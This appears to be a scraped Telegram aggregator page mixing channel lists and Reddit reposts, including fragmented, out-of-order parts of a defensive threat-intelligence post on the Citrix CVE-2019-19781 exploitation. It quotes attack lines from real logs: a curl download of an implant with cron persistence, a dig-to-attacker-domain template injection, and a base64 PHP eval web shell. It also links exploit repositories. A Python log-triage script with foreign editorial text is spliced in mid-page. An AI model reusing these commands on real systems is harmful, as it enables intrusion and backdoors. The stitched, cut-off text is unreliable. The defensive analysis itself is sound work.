reddit2telegram | Unsorted

Telegram channel reddit2telegram - reddit2telegram Announcements


Chat: @r_channels.


reddit2telegram Announcements

⬇️ All active channels:
01. @r_gifs
02. @r_jokes
03. @r_funny
04. @datascientology
05. @asiangirlsbeingcute
06. @r_behindthegifs
07. @pythondaily
08. @r_bitcoin
09. @RedditHistory
10. @news756
11. @r_pics_redux
12. @RedditCats
13. @r_til
14. @awwnime
15. @r_mlp
16. @ya_metro
17. @r_Showerthoughts
18. @r_me_irl
19. @r_dankmemes
20. @r_HighQualityGifs
21. @PoliticalHumor
22. @OldSchoolCool
23. @rddit
24. @denpasong
25. @reddit_all
26. @r_AskReddit
27. @r_explainmelikeimfive
28. @r_changemyview
29. @just_hmmm
30. @programmer_humor
31. @dailyfoodporn
32. @r_overwatch
33. @r_cryptocurrency
34. @r_listentothis
35. @r_ramen
36. @r_fantheories
37. @r_SlimeRancher
38. @r_googleplaydeals
39. @Indiancelebs
40. @r_pcmasterrace
41. @GIFFFs
42. @r_wow
43. @r_minecraft
44. @r_wholesomememes
45. @r_streetwear
46. @BetterEveryLoop
47. @reddit_fashion
48. @r_opensignups
49. @r_BigAnimeTiddies
50. @r_Damnthatsinteresting
51. @fakealbumcovers
52. @dash_cams
53. @r_mild
54. @r_porn
55. @r_formula1
56. @r_cpp
57. @r_gaming
58. @r_dontdeadopeninside
59. @r_linux
60. @reddit_android
61. @r_TechSupportGore
62. @r_indiaa
63. @r_dndgreentext
64. @r_dndmemes
65. @r_chemicalreactiongifs
66. @r_wheredidthesodago
67. @r_SwitchHacks
68. @r_books
69. @r_suggest
70. @r_space
71. @r_wasletztepreis
72. @r_greentext
73. @r_crappyoffbrands
74. @r_chemistry
75. @r_vim
76. @r_talesfromtechsupport
77. @r_PewdiepieSubmissions
78. @r_disneyvacation
79. @R_Punny
80. @r_mapporn
81. @r_softwaregore
82. @r_crappydesign
83. @r_comics
84. @r_remotejs
85. @streetmoe
86. @r_foxes
87. @r_digimon
88. @r_furry
89. @r_ik_ihe
90. @r_mildlyinfuriating
91. @r_Animemes
92. @r_wellthatsucks
93. @rtf2memes
94. @r_arma
95. @r_grandorder
96. @r_2meirl4meirl
97. @r_photoshopbattles
98. @r_pornhubcomments
99. @r_animeirl
100. @indepthstories


reddit2telegram Announcements

🔥 This seal has reached peak level of chill

102.9k upvotes
/r/NatureIsFuckingLit
2021 Jun 03
https://redd.it/nrote1
by @NatureIsLit


🏆 Great achievement!
💪 Milestone of 666 subscribers.


reddit2telegram Announcements

Live Betting - Live discussion for all your bets


237 upvotes
/r/SoccerBetting
2022 Dec 28
https://redd.it/zx4oro
by @rsoccerbetting


🎂🎂🎂🎂🎂
🎁 Today @rsoccerbetting is 5 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
* SANS observed payloads
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/)
* SANS observe crypto miners on January 12th
* [https://twitter.com/sans\_isc/status/1216375320846176261](https://twitter.com/sans_isc/status/1216375320846176261)
* TrustedSec Honeypot analysis
* [https://www.trustedsec.com/blog/netscaler-honeypot/](https://www.trustedsec.com/blog/netscaler-honeypot/)
* AlienVault OTX pulse - [https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489](https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489)
* FireEye - [https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html](https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html)
* FireEye - NOTROBIN - [https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html](https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html)
* German Government [https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove\_bds/](https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/)

**Doozer Exploitation Intelligence**

[https://twitter.com/michel228/status/1216771783656910849](https://twitter.com/michel228/status/1216771783656910849)

Found this in the logs:

    curl http://NN.NN.NN.NN:8081/2a9c665438cd0c8a9c4a25b2a6e0885f -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Payload dropped hash (SHA256): 177c3d8389c71065c2ff2e74ab190486ade95869f6655a1e544f5ee41334517e

This is a 2MB implant written in Go - uses AES, persistence via Cron etc.

[u/undermyne](https://www.reddit.com/u/undermyne/) **Exploitation Intelligence**

*I just spent a few hours cleaning up an exploited VPX for a customer. As observed below, the ns.conf was compromised (copied and I assume the copy was grabbed). The passwd file was also taken (nothing of import in that one) and the* *personalbookmark.pl* *file was modified. Following cleanup there were 5 active processes running under nobody and one of them would automatically restart. To be safe I reverted to a backup from prior to the exploit being released. Patched and returned to service and all is well. If the bind logs indicate that a file was deleted you can find the deleted file in the /var/tmp/netscaler/portal/templates directory (or other relevant tmp folders). The XML files are your best bet at trying to figure out what was attempted. Thankfully the 9 attempts on the one I just fixed looked like they were basically trying to sort out what they could and couldn't do. Start with the httpaccess log, then use time stamps to search bind logs, and then see what was done with the xml.ttc2 files in the tmp folders.*

**NCC Group/Fox-IT Exploitation Intelligence**

* Actor 1 observed January 11th we can see exploiting this vulnerability has the following log patterns (where the filename is a random alpha upper/lower case .xml). The attacker is observed using cron for persistence.
* Actor 1 observed January 12th changed their payload to drop a binary called netscalerd which is a coinminer
* [https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection](https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection)

    POST /vpn/../vpns/portal/scripts/newbm.pl
    GET/vpn/../vpns/portal/XIaoLBFveLyvUfUGiWAwElIJNERhpmrBM.xml

* Actor 2 observed January 13 around 15:30 UTC (not clear if someone is


reddit2telegram Announcements

[https://x1sec.com/CVE-2019-19781-DFIR](https://x1sec.com/CVE-2019-19781-DFIR)
* via SSH - [https://twitter.com/cyb3rops/status/1215974764227039238](https://twitter.com/cyb3rops/status/1215974764227039238) (caveat: .. doesn't need to be in the URL in all exploitation scenarios)

    ssh -t [address] 'grep -r "/../vpns" /var/log/http*'

**Vendor mitigation**

* [https://support.citrix.com/article/CTX267679](https://support.citrix.com/article/CTX267679)
* [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027)

Citrix have now (8pm UTC Jan 11) published when they expect patched builds to be available - from [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027) \- some are saying patches are available already to large clients

* 10.5 - 10.5.70.x - 31st January 2020
* 11.1 - 11.1.63.x - 20th January 2020
* 12.0 - 12.0.63.x - 20th January 2020
* 12.1 - 12.1.55.x - 27th January 2020
* 13.0 - 13.0.47.x - 27th January 2020

Citrix blog by their CISO - [https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/)

**3rd party mitigation steps / advice**

* [https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway](https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway)
* [https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4](https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4)
* Palo Alto content version 8224 or newer.
* 8224 contains detection code for this CVE and will reset the connection before the vulnerability can be exploited. Resets are visible in the threat logs with a name of "Citrix Application Delivery Controller And Gateway Directory Traversal Vulnerability".
* Fortinet IPS 15.754 has a signature - default action is 'pass' though
* [https://fortiguard.com/encyclopedia/ips/48653](https://fortiguard.com/encyclopedia/ips/48653)
* from the comments by [u/ragogumi](https://www.reddit.com/u/ragogumi/)
* "*Fortinet IPS sig appears to be ineffective at detecting or mitigating. I've seen nothing in IPS logs related to this CVE - and cisagov checker, nessus scans and 3rd party red team attempts have not trigger IPS sensor, regardless of remediation state.*"
* Checkpoint released IPS protection too, 2020-01-12, "Citrix Multiple Products Directory Traversal (CVE-2019-19781)". Default action seems to be "Detect".
* [https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html](https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html)

**Details on how to exploit**

* [https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/](https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/)
* [https://github.com/jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781)

**Checkers**

* [https://github.com/cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) (USA Government)
* [https://github.com/mekoko/CVE-2019-19781](https://github.com/mekoko/CVE-2019-19781) (Chinese)
* [https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse](https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse) (nmap script)
* [https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse](https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse) (nmap script)
* [https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1](https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1) (PowerShell)
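
The log triage this post describes (the `grep` over `/var/log/http*`, the caveat that `..` need not appear in the URL, and the POST to `newbm.pl` followed by a GET of a random `.xml` that NCC Group/Fox-IT list), as an added example that is not part of the original post or of any tool it links. It assumes the access log is in Apache common/combined format; the function names, the 10-minute pairing window and the sample lines are constructed for illustration.

```python
import posixpath
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Assumption: the HTTP access log uses Apache common/combined log format.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Patterns from the post, matched on the canonical path so the /vpn/../
# prefix is optional (the post notes ".." is not always in the URL).
SCRIPT_RE = re.compile(r'^/vpns/portal/scripts/[^/]+\.pl$')
XML_RE = re.compile(r'^/vpns/portal/[^/]+\.xml$')


def normalise(target):
    """Return (canonical_path, used_traversal) for a request target."""
    path = unquote(target.split('?', 1)[0])   # drop query, decode %2e etc.
    path = re.sub(r'/+', '/', path)           # collapse repeated slashes
    used_traversal = '..' in path.split('/')
    return posixpath.normpath(path), used_traversal


def parse_line(line):
    """Return an event dict for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, traversal = normalise(m['target'])
    if m['method'] == 'POST' and SCRIPT_RE.match(path):
        kind = 'script_post'
    elif m['method'] == 'GET' and XML_RE.match(path):
        kind = 'xml_fetch'
    else:
        return None
    try:
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    except ValueError:
        return None
    return {'src': m['src'], 'ts': ts, 'kind': kind, 'path': path,
            'traversal': traversal, 'status': int(m['status'])}


def triage(lines, window=timedelta(minutes=10)):
    """Flag matching requests; mark an XML fetch that follows a script POST
    from the same source within `window` as the higher-priority pair."""
    last_post = {}
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev['kind'] == 'script_post':
            last_post[ev['src']] = ev['ts']
        else:
            posted = last_post.get(ev['src'])
            if posted is not None and timedelta(0) <= ev['ts'] - posted <= window:
                ev['kind'] = 'xml_fetch_after_post'
        findings.append(ev)
    return findings


# Constructed sample lines (documentation address ranges, made-up file names).
# Requests without traversal can also be ordinary portal use by a logged-in
# user (assumption), so treat traversal=False hits as lower confidence.
SAMPLE_LOG = '''\
192.0.2.10 - - [12/Jan/2020:10:15:01 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143
192.0.2.10 - - [12/Jan/2020:10:15:02 +0000] "GET /vpn/../vpns/portal/AbCdEfGh.xml HTTP/1.1" 200 512
198.51.100.7 - - [12/Jan/2020:11:02:40 +0000] "GET /vpn/%2e%2e/vpns/portal/QwErTy.xml HTTP/1.1" 404 0
203.0.113.5 - - [12/Jan/2020:11:30:00 +0000] "POST /vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143
203.0.113.5 - - [12/Jan/2020:11:30:03 +0000] "GET /vpns/portal/ZxCvBn.xml HTTP/1.1" 200 498
192.0.2.99 - - [12/Jan/2020:12:00:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 2048
'''

if __name__ == '__main__':
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f['ts'].isoformat(), f['src'], f['kind'],
              'traversal' if f['traversal'] else 'no-traversal',
              f['status'], f['path'])
```

Use the timestamps of the flagged lines as the starting point for the bind-log and `.xml.ttc2` template review the post recommends.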

reddit2telegram Announcements

META DO NOT POST TRACKING NUMBERS OR SLIPS

You'll potentially reveal both your address and the other person's address along with other identification. We just had incidents where the seller's address, seller's full name, seller's phone number, buyer's address, buyer's full name, and other package-specific information was leaked.

It's a mess to clean up, as other websites archive comments with links, and even after we take down the offending comment, we still have to contact image hosting sites with takedown requests. The posting of this message was delayed until said image hosting site took down the image.

Your post will be removed and other consequences will be handed down. Doxxing someone, intentionally or not, is a serious offense.

43 upvotes
/r/thinkpadsforsale
2020 Apr 16
https://redd.it/g2ngcl
by @rthinkpadsforsale


🎂🎂🎂🎂🎂
🎁 Today @rthinkpadsforsale is 5 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

First vs. Second Playthrough

8.6k upvotes
/r/DiscoElysium
2021 Apr 13
https://redd.it/mpsfre
by @r_DiscoElysium
#disco #discoelysium #hardcore #crpg #indiegames

🏆 Great achievement!
💪 Milestone of 10 subscribers.


reddit2telegram Announcements

Directed by Robert B. Tikka

4.7k upvotes
/r/islam
2021 Jan 13
https://redd.it/kwlztz
by @r_islam_channel
#islam

🏆 Great achievement!
💪 Milestone of 420 subscribers.


reddit2telegram Announcements

absolutelynotmeirl

41.6k upvotes
/r/absolutelynotme_irl
2019 Dec 31
https://redd.it/ehwhp1
by @notme_irl


🏆 Great achievement!
💪 Milestone of 42 subscribers.


reddit2telegram Announcements

[Art] Aki vs Katana Man (Chainsaw Man)

19.6k upvotes
/r/manga
2021 Jan 17
https://redd.it/kz3bhu
by @r_manga2


🎂
🎁 Today @r_manga2 is 1 year old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

Unpredictable Hyderabad

5.2k upvotes
/r/hyderabad
2023 Nov 10
https://redd.it/17s1niq
by @rhyderabad


🎂🎂🎂
🎁 Today @rhyderabad is 3 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

Religion

2.1k upvotes
/r/rimesegate
2021 Jan 04
https://redd.it/kq5ciu
by @r_rimesegate


🏆 Great achievement!
💪 Milestone of 69 subscribers.


reddit2telegram Announcements

Y'all are cool

1.0k upvotes
/r/fullegoism
2020 Mar 22
https://redd.it/fn6ocb
by @fullegoism


reddit2telegram Announcements

801. @r_mwiii
802. @r_emulation
803. @indiandankmemesreddit
804. @r_RedDeadOnline
805. @reddit_infographic


reddit2telegram Announcements

Weekend news

🎉 Welcome to newly active channels: @indiandankmemesreddit, @r_RedDeadOnline, @reddit_infographic. 🎈🎈

🏆 Channel of the week: @r_persona5. Join and enjoy!

🔥 Hottest channels of the week: @r_combatfootage, @r_propagandaposters, @loliconsunite.

🙋
Q: How can I help?
A: Support us on Patreon and promote your favorite channels!

Q: How to make similar channels?
A: Ask at @r_channels or use manual at https://github.com/Fillll/reddit2telegram.

Q: Where to donate?
A: Patreon: https://www.patreon.com/reddit2telegram. Other ways: https://bit.ly/r2t_donate.


reddit2telegram Announcements

Jared, the man behind the famous South Park WoW cosplay has passed away due to Covid-19. RIP
https://www.youtube.com/watch?v=C3I4wpHshuw&ab_channel=mirrodin14

148.1k upvotes
/r/videos
2021 Jan 03
https://redd.it/kpw1i4
by @redditvideos


🎂🎂🎂🎂🎂
🎁 Today @redditvideos is 5 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

trolling)

    ./var/tmp/netscaler/portal/templates/REDACTED.xml.ttc2: $output .= $stash->get(['template', 0, 'new', [ { 'BLOCK' => 'exec(\'dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml\');' } ]]);

for the domain

    Domain Name: IRANNETWORKTEAM.ORG
    Registry Domain ID: D402200000012341868-LROR
    Registrar WHOIS Server: whois.namesilo.com
    Registrar URL: www.namesilo.com
    Updated Date: 2020-01-11T14:17:00Z
    Creation Date: 2020-01-11T13:46:37Z

the TXT record for the domain currently returns

    > set querytype=TXT
    > cmd.IRANNETWORKTEAM.ORG
    Non-authoritative answer:
    cmd.IRANNETWORKTEAM.ORG text = "<?php @eval(base64_decode(strrev(@$_POST[REDACTED])));?>"

So

* pull first stage from DNS TXT field
* uploads second/dynamic stage via POST in specific variable

This post is curated by the team at NCC Group/Fox-IT - [https://www.nccgroup.trust/](https://www.nccgroup.trust/uk/)

206 upvotes
/r/blueteamsec
2020 Jan 11
https://redd.it/en4m7j
by @r_blueteamsec


🎂🎂
🎁 Today @r_blueteamsec is 2 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

[https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix\_CVE-2019-19781](https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix_CVE-2019-19781) (Russian - Windows Binary)
* [https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix\_netscaler\_rce\_cve\_2019\_19781.rb](https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix_netscaler_rce_cve_2019_19781.rb) Added to intrigue-core a week or so ago and then improved it when additional details came out by [u/jcran](https://www.reddit.com/u/jcran/)
* [https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77](https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77) OWASP's
* [https://github.com/x1sec/citrixmash\_scanner](https://github.com/x1sec/citrixmash_scanner)

**Commercial Checkers**

* [https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and](https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and) Tenable's

**Exploits**

* [https://github.com/projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781)
* [https://github.com/ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781)
* [https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py](https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py)
* [https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py](https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py)
* [https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55](https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55)
* [https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md](https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md)
* Exploitation possible with two GETs
* [https://twitter.com/mpgn\_x64/status/1216792205723041795](https://twitter.com/mpgn_x64/status/1216792205723041795)
* Exploitation possible without directory traversal
* [https://twitter.com/mpgn\_x64/status/1216802182760226817](https://twitter.com/mpgn_x64/status/1216802182760226817)

**Post Exploitation**

* [dozer.nz/citrix-decrypt/](https://t.co/xqCq1qHlp7?amp=1)

**Vulnerability Intelligence**

* [https://www.shodan.io/](https://www.shodan.io/) query: 'vuln:cve-2019-19781'
* [https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/](https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/) \- 25,000 endpoints vuln
* Alternate data sets as of 18:00 on the 12th suggest more

**Honeypot**

* [https://github.com/MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot)

**Exploitation Intelligence**

* Mass Scanning / Exploitation Observed on Jan 12th - [https://twitter.com/bad\_packets/status/1216291048185421830](https://twitter.com/bad_packets/status/1216291048185421830)
* Mass Exploitation Observed on Jan 10th - [https://twitter.com/bad\_packets/status/1215431625766424576](https://twitter.com/bad_packets/status/1215431625766424576)
* GreyNoise tagging - [https://twitter.com/GreyNoiseIO/status/1215818626055528453](https://twitter.com/GreyNoiseIO/status/1215818626055528453)
* [https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781](https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781)
* SANS honeypot uptick -
* 15:42 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1216022602436808704](https://twitter.com/sans_isc/status/1216022602436808704)
* 4:46 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1215857528749338624](https://twitter.com/sans_isc/status/1215857528749338624)
* Blog:


reddit2telegram Announcements

Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation

***Last update:*** January 20 - 07:01 UTC/GMT

**Patches Now Out for Some**

Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up

Citrix blog post: [Vulnerability Update: First permanent fixes available, timeline accelerated](https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/)

ADC version 12.0: [https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html)

ADC version 11.1: [https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html)

**Important**

Citrix issued revised updates today

* [https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/)

Fox-IT issued an analysis

* [https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf](https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf)

**Impact / Root Cause**

remote pre-auth arbitrary command execution due to logic vuln i.e. reliable execution possible.

**Products affected**

* Citrix ADC and Citrix Gateway version 13.0 all supported builds
* Citrix ADC and NetScaler Gateway version 12.1 all supported builds
* Citrix ADC and NetScaler Gateway version 12.0 all supported builds
* Citrix ADC and NetScaler Gateway version 11.1 all supported builds
* Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

***Amazon Web Services*** *-* [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840)

At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id".

**Background on the vulnerability**

* [https://nvd.nist.gov/vuln/detail/CVE-2019-19781](https://nvd.nist.gov/vuln/detail/CVE-2019-19781)
* [https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/)

**Sigma rules**

* [https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml](https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml)

**Snort rules**

* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)

**Snort/Suricata rules**

* Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats
* [https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/)

**Exploitation Forensic Artifacts**

* [https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/](https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/)
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)

reddit2telegram Announcements

Tamamo no mae

379 upvotes
/r/Tamamo
2021 Jun 11
https://redd.it/nx6nvc
by @r_tamamo
#tamamo #fate #fatego

🎂🎂
🎁 Today @r_tamamo is 2 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

Don't know if memes are allowed here but here it is

1.9k upvotes
/r/algotrading
2022 Jan 27
https://redd.it/sdmlw7
by @r_algotrading
#algorithmic #trading #trade #stock #market

🎂🎂
🎁 Today @r_algotrading is 2 years old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

Watson, Stone and Roberts Goddesses!

282 upvotes
/r/ChurchOfEmma
2021 Mar 01
https://redd.it/lv11db
by @r_churchofemma


🎂
🎁 Today @r_churchofemma is 1 year old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

They say that back then it was the year 2020

3.0k upvotes
/r/Ratorix
2020 Sep 21
https://redd.it/iwwxtc
by @r_Ratorix


🏆 Great achievement!
💪 Milestone of 50 subscribers.


reddit2telegram Announcements

Woke media strikes again 🤦‍♂️

7.1k upvotes
/r/OkBuddyFresca
2022 Aug 16
https://redd.it/wq92nc
by @r_okbuddyfresca


🎂
🎁 Today @r_okbuddyfresca is 1 year old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

Found this online, is it true?

44.7k upvotes
/r/OnePiece
2023 Sep 05
https://redd.it/16a8tki
by @r_onepiecer


🎂
🎁 Today @r_onepiecer is 1 year old.
🎉 Congratulations! 🎈


reddit2telegram Announcements

In a protest against censorship, photographer A.L. Schafer staged this iconic photograph in 1934, violating as many rules as possible in one shot.

16.0k upvotes
/r/PropagandaPosters
2022 Oct 07
https://redd.it/xxwgz1
by @r_propagandaposters
#history #psychology #war #military #technology #propaganda

🏆 Great achievement!
💪 Milestone of 4000 subscribers.


reddit2telegram Announcements

Cona Ember
https://i.imgur.com/3gZ8wtz.jpg

5.6k upvotes
/r/streetmoe
2023 May 07
https://redd.it/13b58mc
by @streetmoe


🏆 Great achievement!
💪 Milestone of 800 subscribers.


reddit2telegram Announcements

Happy independence day everyone

9.4k upvotes
/r/Kerala
2023 Aug 14
https://redd.it/15r790c
by @r_kerala


🏆 Great achievement!
💪 Milestone of 300 subscribers.


reddit2telegram Announcements

701. @r_heraldry
702. @r_bolehland
703. @r_embedded
704. @r_kochin
705. @r_pinetime
706. @r_buildapcsales
707. @r_dalle2
708. @InstaIndia
709. @weirddalle
710. @r_indiandankmemes
711. @dailygratitudee
712. @r_riscv
713. @r_sweden
714. @rshittymoviedetails
715. @r_stray
716. @r_Padres
717. @r_redpillmalayalam
718. @rStableDiffusion
719. @r_chels
720. @uminekoreddit
721. @r_MWII
722. @brasildob
723. @r_Computers
724. @r_FemaleCelebrityBiceps
725. @GameplayMation
726. @fullegoism
727. @r_okbuddychicanery
728. @rAnarchism
729. @r_linuxmemes_1
730. @r_hamsters
731. @r_edgerunners
732. @Mapporncirclejerk
733. @r_askmen
734. @r_witcher3
735. @r_Ultrakill
736. @r_komisan
737. @r_PokemonRMXP
738. @r_ramiayana
739. @r_versus
740. @M2_D4
741. @r_tensei
742. @r_africa
743. @r_science
744. @r_scala
745. @r_onepiecer
746. @r_manga2
747. @r_okbuddyfresca
748. @r_churchofemma
749. @r_gharkekalesh
750. @r_punee
751. @DongistanSub
752. @r_psychology1
753. @r_Literaturememes
754. @r_MuscularCelebrities
755. @r_adhdmeme
756. @r_nijisanji
757. @r_ShitpostTC
758. @chainsawfolk
759. @r_dankinindia
760. @worldnewsvideo
761. @r_copypasta
762. @rExmuslim
763. @r_metalgearsolid
764. @r_thesilphroad
765. @env_chat
766. @r_0sanitymemes
767. @r_outerwilds
768. @r_tessafowler
769. @r_redfall
770. @OldSchoolRuneScape2007
771. @JEENEETardsReddit
772. @SubredditMix
773. @r_deathStranding
774. @rCarsIndia
775. @r_frankocean
776. @r_tylerthecreator
777. @r_playboicarti
778. @r_hiphopheads
779. @r_kendricklamar
780. @r_dotnet
781. @r_nvidia
782. @hub_posts
783. @r_shitposting0
784. @r_travis_scott
785. @passdenied
786. @JEENEETardsReddit2
787. @r_silenthill
788. @r_JapanPics
789. @r_GranTurismo
790. @rantitrampo
791. @r_PSX
792. @stablediffusion_r
793. @premierleague_r
794. @r_DiscoElysium
795. @reddit_argentina
796. @blue_archive_reddit
797. @r_ps3
798. @r_starfield
799. @r_ps2
800. @privacymemes1
